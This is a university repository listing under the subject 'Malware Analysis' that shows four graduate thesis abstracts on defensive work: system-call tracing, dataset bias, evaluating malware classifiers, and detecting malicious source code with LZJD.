Browsing by Subject "Malware Analysis"
Now showing 1 - 4 of 4
Results Per Page
Sort Options
Item Automate the tracing of Windows System Calls to identify malicious activities(2019-01-01) Goenka, Siddhant; Nicholas, Charles; Computer Science and Electrical Engineering; Computer ScienceWe describe the problems addressed by various malware or malicious applications on the Microsoft Windows Operating System. Our work focuses on automatic the dynamic malware analysis by intercepting Windows system calls that help to cover a larger range of malware, including the newly evolved fileless variants. Intercepting system calls allow us to monitor malicious activities in a way that malicious behavior can be easily identified without the manual efforts of disassembling binaries. The results will show how our work can help in automating the process of API Hooking for the open source community to detect Byzantine behaviors, rather than focusing on improving the detection mechanism.Item Detecting, Quantifying, and Mitigating Bias in Malware Datasets(2020-01-20) Seymour III, John Jefferson; Nicholas, Charles K; Computer Science and Electrical Engineering; Computer ScienceThe effectiveness of a malware classifier on new data is tightly coupled with the data upon which is was trained and validated. Malware data are collected from various sources, which must be trusted to be correct about the given labels as well as independent and identically distributed (i.i.d.). However, little research exists toward assessing how well this assumption holds in practice. Given data from various sources of unknown quality, what can we know about a malware classifier's ability to generalize to future, unseen data? Can we even create a malware classifier that generalizes, given issues of data quality and concept drift? How can we assure others that our malware classifier doesn't have underlying data quality issues? This dissertations describes the labeling of a massive dataset of over 33 million raw malware samples so that it can be used both for classification of malware families as well as a baseline to measure drift. It then demonstrates that the models from multiple prior studies are highly sensitive to drift. It finally tests new methods for regularization, explicitly using the source of the data in order to penalize features which don't generalize from one dataset to another.Item Evaluating Automatic Malware Classifiers in the Absence of Reference Labels(2020-01-01) Joyce, Robert j; Nicholas, Charles; Computer Science and Electrical Engineering; Computer ScienceThe malware analysis community is completely devoid of a diverse, up to date reference dataset with ground truth labels. Consequentially, it is typical for automatic malware classifiers to be evaluated using custom datasets with near ground truth labels. However, classifier evaluation using near ground truth labels can yield erroneous or biased results. We propose an alternative classifier evaluation framework that does not require reference labels. We introduce the concept of a ground truth refinement and propose potential methods for constructing an approximation of one from a malware dataset. We prove that using a ground truth refinement it is possible to compute lower bounds on precision and error rate as well as upper bounds on recall and accuracy without requiring ground truth reference labels. We perform a case study on the popular AVClass malware labeler using our proposed evaluation framework.Item Identifying Malicious Source Code Using LZJD(2021-01-01) Roca, Alexander James; Nicholas, Charles; Computer Science and Electrical Engineering; Computer ScienceThis work presents a proof-of-concept of the use of Lempel-Ziv Jaccard Distance, or LZJD, as a means of detecting malicious source code by comparing the suspect source code to a library of known malicious source code. In this paper we detail our method of making these comparisons, evaluate how well it works, and suggest some potential methods of improvement for future work. We conclude that LZJD does appear to be effective at identifying similar files, but that it appears to struggle when attempting to aggregate the scores to compare entire source code projects.